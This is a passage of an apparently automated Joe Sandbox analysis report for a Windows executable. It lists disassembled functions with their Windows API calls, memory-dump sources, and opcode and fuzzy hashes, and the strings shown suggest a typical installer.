                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: EnumFontsMessageNotifyReleaseSend
                                                              • String ID:
                                                              • API String ID: 2649214853-0
                                                              • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                              • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                              • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                              • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                              Function 0047DD98 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMetricsMultiSystemWide
                                                              • String ID: /G
                                                              • API String ID: 224039744-2088674125
                                                              • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                              • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                              • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                              • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                              Function 0042DEC0 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                              • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseEnum
                                                              • String ID:
                                                              • API String ID: 2818636725-0
                                                              • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                              • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                              • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                              • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                              Function 004527E8 Relevance: 3.1, APIs: 2, Instructions: 60processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 2919029540-0
                                                              • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                              • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                              • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                              • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                              Function 0040ADD8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                              • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindFree
                                                              • String ID:
                                                              • API String ID: 4097029671-0
                                                              • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                              • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                              • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                              • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                              Function 0041EEA4 Relevance: 3.0, APIs: 2, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                              • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Thread$CurrentEnumWindows
                                                              • String ID:
                                                              • API String ID: 2396873506-0
                                                              • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                              • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                              • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                              • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                              Function 00452C80 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastMove
                                                              • String ID:
                                                              • API String ID: 55378915-0
                                                              • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                              • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                              • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                              • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                              Function 00452770 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                              • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                              • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                              • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                              Function 0042323C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                              • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CursorLoad
                                                              • String ID:
                                                              • API String ID: 3238433803-0
                                                              • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                              • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                              • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                              • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                              Function 0042E394 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                              • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLibraryLoadMode
                                                              • String ID:
                                                              • API String ID: 2987862817-0
                                                              • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                              • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                              • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                              • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                              Function 0047C88B Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                              • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeKnownPathTask
                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                              • API String ID: 969438705-544719455
                                                              • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                              • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                              • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                              • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                              Function 004508F8 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                              • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                              • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                              • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                              • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                              Function 0040625C Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocLock
                                                              • String ID:
                                                              • API String ID: 15508794-0
                                                              • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                              • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                              • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                              • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                              Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID:
                                                              • API String ID: 2087232378-0
                                                              • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                              • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                              • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                              • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                              Function 004085DC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                              • String ID:
                                                              • API String ID: 1658689577-0
                                                              • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                              • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                              • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                              • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                              Function 0041FB9C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: InfoScroll
                                                              • String ID:
                                                              • API String ID: 629608716-0
                                                              • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                              • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                              • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                              • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                              Function 0046C450 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                              • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                              • String ID:
                                                              • API String ID: 3319771486-0
                                                              • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                              • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                              • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                              • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                              Function 00441394 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
